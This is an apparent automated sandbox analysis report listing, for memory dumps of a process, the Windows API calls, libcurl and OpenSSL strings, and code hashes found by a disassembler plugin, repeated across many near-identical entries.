                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memcpy$strlen
                                                                                                                                                                                                                                                            • String ID: Failed writing body (%zu != %zu)$Failed writing header$Write callback asked for PAUSE when not supported!
                                                                                                                                                                                                                                                            • API String ID: 2619041689-2483876519
                                                                                                                                                                                                                                                            • Opcode ID: 6acbc073930a276b02c9d7b076600f4d133a9cf399f48c83e6b33a65560b32d6
                                                                                                                                                                                                                                                            • Instruction ID: 6bf5adf329c77ee4799bce1a9438d798a18167e82b8b9161b155a6d249a6342c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6acbc073930a276b02c9d7b076600f4d133a9cf399f48c83e6b33a65560b32d6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0091F53162C3059BDB219F29ED85BAAB7E5EF8430CF15002EE84C47241F775ADA1DBA1
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • Connection timed out after %d milliseconds, xrefs: 00247C65
                                                                                                                                                                                                                                                            • Operation timed out after %d milliseconds with %I64d out of %I64d bytes received, xrefs: 00247CC4
                                                                                                                                                                                                                                                            • Internal error clearing splay node = %d, xrefs: 00248AD1
                                                                                                                                                                                                                                                            • In state %d with no conn, bail out!, xrefs: 00248CB8
                                                                                                                                                                                                                                                            • *, xrefs: 00248C1E
                                                                                                                                                                                                                                                            • Operation timed out after %d milliseconds with %I64d bytes received, xrefs: 00248101
                                                                                                                                                                                                                                                            • Resolving timed out after %d milliseconds, xrefs: 002476B7
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: *$Connection timed out after %d milliseconds$In state %d with no conn, bail out!$Internal error clearing splay node = %d$Operation timed out after %d milliseconds with %I64d bytes received$Operation timed out after %d milliseconds with %I64d out of %I64d bytes received$Resolving timed out after %d milliseconds
                                                                                                                                                                                                                                                            • API String ID: 0-1633414443
                                                                                                                                                                                                                                                            • Opcode ID: ad204a0741c306ff343ac7494cc55cdbed7bda7c6b2ce8f2d14881b979e43d5a
                                                                                                                                                                                                                                                            • Instruction ID: adf3a0fb1ef4748929c8283ad06e4045990f82f1ff3bc2d0bd42c8b92154d715
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ad204a0741c306ff343ac7494cc55cdbed7bda7c6b2ce8f2d14881b979e43d5a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6E1ED716247019FE729AF14C881B6BB3E5FF45304F04492DF999873A2EB71E8648B52
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00233716
                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00233734
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000008,00000000), ref: 0023373E
                                                                                                                                                                                                                                                            • Module32First.KERNEL32(00000000), ref: 00233759
                                                                                                                                                                                                                                                            • Module32Next.KERNEL32(00000000), ref: 00233784
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000), ref: 0023379D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Module32$CloseCreateErrorFirstHandleLastNextSnapshotToolhelp32memset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2996058108-0
                                                                                                                                                                                                                                                            • Opcode ID: d057cf8fca56347aaca80a956d5a24871b6d82e15b9761acb711da797e8e6c6a
                                                                                                                                                                                                                                                            • Instruction ID: 5bef0444e88eb8d07a30b32aa5ca0bad21b42e64ffd897304c4f68413ef1412e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d057cf8fca56347aaca80a956d5a24871b6d82e15b9761acb711da797e8e6c6a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C01FEF1B2020037F660B5797C46BAB758C9F89368F150535F948C6182F579EB2446B6
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: Auth$Genu$cAMD$enti$ineI$ntel
                                                                                                                                                                                                                                                            • API String ID: 0-1714976780
                                                                                                                                                                                                                                                            • Opcode ID: 30a1b6f0e564be8d07df84ea30504acaa5bb7ec169232fbda98bf8fdb4b6cb7d
                                                                                                                                                                                                                                                            • Instruction ID: c78eee9982973c4516feb2a95ed775448f6ff2266e1487101e5ffcc8fda12bc9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30a1b6f0e564be8d07df84ea30504acaa5bb7ec169232fbda98bf8fdb4b6cb7d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D1313877E245B70BFB3A687A984436C20839390330F2BC739E53AD76D5E578CD825290
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • recv.WS2_32(?,00000000,?,00000000), ref: 002674B1
                                                                                                                                                                                                                                                            • send.WS2_32(?,?,?,00000000), ref: 002674DD
                                                                                                                                                                                                                                                            • WSAGetLastError.WS2_32(?,?,-00000009,00276F14,?,?,?,-00000009,?), ref: 002674F3
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLastrecvsend
                                                                                                                                                                                                                                                            • String ID: Send failure: %s
                                                                                                                                                                                                                                                            • API String ID: 3418755260-857917747
                                                                                                                                                                                                                                                            • Opcode ID: c9e71e3a2f274153a554fcfe991f382780fa33383af74ea3260eac569ea0569b
                                                                                                                                                                                                                                                            • Instruction ID: 085a80a09fa62e0a13ad1fc9a1cf35d1af9d97c609dd37a0a0ac25cc9aca4028
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9e71e3a2f274153a554fcfe991f382780fa33383af74ea3260eac569ea0569b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D6416D712182019FE710CF24EC88B6677F8EF89328F6406A8E85A9B3C5D735ED51CB61
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strlen
                                                                                                                                                                                                                                                            • String ID: Content-Type
                                                                                                                                                                                                                                                            • API String ID: 39653677-2058190213
                                                                                                                                                                                                                                                            • Opcode ID: 1c1a28334bd9df147ac7ea9255d36ff17e56d005605bc53b7cd78bca8311259c
                                                                                                                                                                                                                                                            • Instruction ID: fdfeb8f7f3a5efbfd2a6c4dbc07a67971125354fc0b132baa98917621b88148d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c1a28334bd9df147ac7ea9255d36ff17e56d005605bc53b7cd78bca8311259c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D84123B2A103118BEB25DF14D8C0B22B7A5BF54355F0E9078DD089B306E775EE28CB96
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strlen
                                                                                                                                                                                                                                                            • String ID: *$7$Internal error clearing splay node = %d$Re-used connection seems dead, get a new one
                                                                                                                                                                                                                                                            • API String ID: 39653677-2891390500
                                                                                                                                                                                                                                                            • Opcode ID: 1a00e5041609516ea1a45d47e9cacf3bfdddd22196afa7e8e644f3eff281dd86
                                                                                                                                                                                                                                                            • Instruction ID: 82b8b09423fab740c5b14fd5c354cef29c9c14337d5ab96728e9eaa9a312c92f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1a00e5041609516ea1a45d47e9cacf3bfdddd22196afa7e8e644f3eff281dd86
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3E1B0B16243019FE729DF14C885B6E73E4EF44704F044929F9998B392EB71ED64CB62
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memcpy.MSVCRT(?,OpenSSL/1.1.1a (Schannel),0000001A,?,?,?,?,00241C39,OpenSSL/1.1.1a (Schannel),00000050,0023EECE,00000004,?,?,?,00238BA3), ref: 00258B9B
                                                                                                                                                                                                                                                            • memcpy.MSVCRT(?,OpenSSL/1.1.1a (Schannel),?,?,?,?,?,00241C39,OpenSSL/1.1.1a (Schannel),00000050,0023EECE,00000004,?,?,?,00238BA3), ref: 00258BAF
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memcpy
                                                                                                                                                                                                                                                            • String ID: OpenSSL/1.1.1a (Schannel)
                                                                                                                                                                                                                                                            • API String ID: 3510742995-2782720811
                                                                                                                                                                                                                                                            • Opcode ID: 33058caa5b63fae8760d72798efae8ed78c60a9d17b8f98831fcf7b0f6d58657
                                                                                                                                                                                                                                                            • Instruction ID: 2700458ad15dea712f267b58213a892e9beffb66557140d9cfab7e79af02366e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33058caa5b63fae8760d72798efae8ed78c60a9d17b8f98831fcf7b0f6d58657
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F721C1746146568FC324AF4AEC80B653BDCE755309F1406A9EC42E7211EAF4AC0987AD
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memcpy.MSVCRT(?,OpenSSL/1.1.1a (Schannel),0000001A), ref: 00258C8B
                                                                                                                                                                                                                                                            • memcpy.MSVCRT(?,OpenSSL/1.1.1a (Schannel),?), ref: 00258C9F
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memcpy
                                                                                                                                                                                                                                                            • String ID: OpenSSL/1.1.1a (Schannel)
                                                                                                                                                                                                                                                            • API String ID: 3510742995-2782720811
                                                                                                                                                                                                                                                            • Opcode ID: 33058caa5b63fae8760d72798efae8ed78c60a9d17b8f98831fcf7b0f6d58657
                                                                                                                                                                                                                                                            • Instruction ID: 6269ddeb53fe53ce5fdb7ab13386d425da7d14d8dd9f631406109869204160b2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33058caa5b63fae8760d72798efae8ed78c60a9d17b8f98831fcf7b0f6d58657
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A21D3346156568FC718AF5AECC0B653BD8E755302F14057AEC46F7211EBF4AC0983AD
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000040), ref: 00259BD7
                                                                                                                                                                                                                                                            • CryptGenRandom.ADVAPI32(?,?,?,?,00000000,00000000,00000001,F0000040), ref: 00259BED
                                                                                                                                                                                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000,?,00000000,00000000,00000001,F0000040), ref: 00259C00
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1815803762-0
                                                                                                                                                                                                                                                            • Opcode ID: 69d00149232414f47e5e06deb0ff79aa8833f6a4ca3c373068e9ca0c934f59ac
                                                                                                                                                                                                                                                            • Instruction ID: d9db0e07bbcbb7d8cf864e12080fc9f03c2b2f48b2b060beb980114d8f1055b3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69d00149232414f47e5e06deb0ff79aa8833f6a4ca3c373068e9ca0c934f59ac
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90F092B0344302BBEB100FA0EC89B1A3AD5BB44746F140438FA41E91A0D3B6D86CAB09
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • Internal error clearing splay node = %d, xrefs: 00248AD1
                                                                                                                                                                                                                                                            • Forcing HTTP/1.1 for NTLM, xrefs: 00247F80
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: Forcing HTTP/1.1 for NTLM$Internal error clearing splay node = %d
                                                                                                                                                                                                                                                            • API String ID: 0-4157828289
                                                                                                                                                                                                                                                            • Opcode ID: 75c03142d95e341da3bcb2bdb9f3f875c3212c119d9263308d3a5c010847ea7c
                                                                                                                                                                                                                                                            • Instruction ID: a9290e4b0fbdd6bd25c8a096e0fdd8de5ad9f8234e008f0efa58c0bc4b24b287
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75c03142d95e341da3bcb2bdb9f3f875c3212c119d9263308d3a5c010847ea7c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 94F1D2716247019FE7299F24DC45B6BB7E6FF84304F044828F89A87262EB71ED64CB52
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: *$Internal error clearing splay node = %d
                                                                                                                                                                                                                                                            • API String ID: 0-4114038171
                                                                                                                                                                                                                                                            • Opcode ID: 68f17455f46a9d42c9436023056f033767cf23a45cb88fffce61fa917fd307c7
                                                                                                                                                                                                                                                            • Instruction ID: 5b8c1f1514b82e911823b9e644988ac0fe49c920e6503d45f2062cb7850ff102
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68f17455f46a9d42c9436023056f033767cf23a45cb88fffce61fa917fd307c7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1A1E2716346019FE729EF28DC41B2EB3E5BF41304F144929E999873A1EB71EC64CB62
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
